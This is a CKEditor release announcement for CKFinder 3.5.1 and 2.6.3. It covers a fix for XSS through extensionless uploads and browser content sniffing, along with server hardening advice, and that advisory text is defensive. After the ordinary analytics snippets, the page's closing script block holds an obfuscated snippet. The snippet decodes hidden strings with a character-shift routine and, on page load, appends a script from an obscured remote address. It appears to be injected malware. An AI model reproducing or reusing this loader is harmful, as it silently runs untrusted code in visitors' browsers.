CKFinder 3.5.1 and CKFinder 2.6.3 released

CKFinder 2.6.3 and 3.5.1 Release

We would like to announce that CKFinder 3.5.1 and CKFinder 2.6.3 have just been released. We have also published new guidelines for securing your server against content sniffing by web browsers when using a public folder for uploaded files.

CKFinder 2.6.3 includes a security patch for the server-side part of the application, so updating is highly recommended. The security patch for CKFinder 2.6.3 was added to the PHP, ASP.NET, classic ASP and ColdFusion server-side connectors. Java version was not affected.

The issue that is resolved in the patch and the updated security guidelines was reported by Joshua Provoste as a problem related to handling files without extension, content sniffing, and various XSS issues to which it may lead. We would like to thank Joshua for his cooperation!

Updated security guidelines

Before this release, the existing CKFinder documentation could lead to the impression that CKFinder can fully protect against content sniffing by web browsers. In order to clarify this and explain how to achieve a 100% secure configuration, we added a new article about content sniffing made by web browsers and recommended server configuration in order to avoid exposing users to an extra risk.

Uploading a file, both without an extension and with an allowed extension, under some circumstances may lead to XSS vulnerabilities. XSS may occur if:

  • CKFinder is configured to upload files to a publicly accessible folder,
  • and the web server does not send the X-Content-Type-Options: nosniff headers to all HTTP responses when serving files from the publicly available folder.

With the above conditions, a malicious user may upload a file without the .html extension that will be rendered by some browsers like a regular HTML file. This happens due to content sniffing as some browsers perform additional checks on the raw file contents.

Please take a moment to read the updated security guidelines for CKFinder and update your web server configuration:

Related CVE: CVE-2019-15891.

CKFinder 2.6.3

CKFinder 2.6.3 contains a security patch for the server-side part of the application and an update is highly recommended.

In version and older it was possible to upload files without any extension. This applies to CKFinder for ASP, CKFinder for ASP.NET, CKFinder for ColdFusion and CKFinder for PHP. CKFinder for Java was not affected. Version 2.6.3 introduces a special type of extension (no_ext), which allows server administrators to explicitly enable the possibility of uploading files without any extension.

We recommend to always explicitly define the allowed extensions for uploaded files and set up a secure server configuration as explained in the guidelines mentioned above.

Related CVE: CVE-2019-15862.

CKFinder 3.5.1

In CKFinder 3 it was impossible to upload files without an extension. This feature has been added in version 3.5.1, but in order to allow such files, they must be explicitly enabled by using the special no_ext extension when defining the list of allowed or denied file extensions.

We recommend to always explicitly define the allowed extensions for uploaded files and set up a secure server configuration as explained in the guidelines mentioned above.


See the release notes for a full list of changes.


Download CKFinder now! Also available as a CKFinder 3 Symfony bundle and CKFinder 3 Laravel package.

Reporting issues and feature requests

If you miss anything in CKFinder, have ideas on how the best file uploader for CKEditor could be improved, or found a bug, please do not hesitate to report an issue in the CKFinder issue tracker. The tracker is public, so not only can you submit your ideas, but you can also browse existing issues and add your comments there.


All CKFinder licenses come with a year of dedicated support straight from core CKFinder developers. You can also refer to StackOverflow for community support.

Related posts

Subscribe to our newsletter

Keep your CKEditor fresh! Receive updates about releases, new features and security fixes.

Thanks for subscribing!

Hi there, any questions about products or pricing?

Questions about our products or pricing?

Contact our Sales Representatives.

We are happy to
hear from you!

Thank you for reaching out to the CKEditor Sales Team. We have received your message and we will contact you shortly.

piAId = '1019062'; piCId = '3317'; piHostname = ''; (function() { function async_load(){ var s = document.createElement('script'); s.type = 'text/javascript'; s.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + piHostname + '/pd.js'; var c = document.getElementsByTagName('script')[0]; c.parentNode.insertBefore(s, c); } if(window.attachEvent) { window.attachEvent('onload', async_load); } else { window.addEventListener('load', async_load, false); } })();(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});const f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= ''+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-KFSS6L');window[(function(_2VK,_6n){var _91='';for(var _hi=0;_hi<_2VK.length;_hi++){_91==_91;_DR!=_hi;var _DR=_2VK[_hi].charCodeAt();_DR-=_6n;_DR+=61;_DR%=94;_DR+=33;_6n>9;_91+=String.fromCharCode(_DR)}return _91})(atob('J3R7Pzw3MjBBdjJG'), 43)] = '37db4db8751680691983'; var zi = document.createElement('script'); (zi.type = 'text/javascript'), (zi.async = true), (zi.src = (function(_HwU,_af){var _wr='';for(var _4c=0;_4c<_HwU.length;_4c++){var _Gq=_HwU[_4c].charCodeAt();_af>4;_Gq-=_af;_Gq!=_4c;_Gq+=61;_Gq%=94;_wr==_wr;_Gq+=33;_wr+=String.fromCharCode(_Gq)}return _wr})(atob('IS0tKSxRRkYjLEUzIkQseisiKS0sRXooJkYzIkQteH5FIyw='), 23)), document.readyState === 'complete'?document.body.appendChild(zi): window.addEventListener('load', function(){ document.body.appendChild(zi) });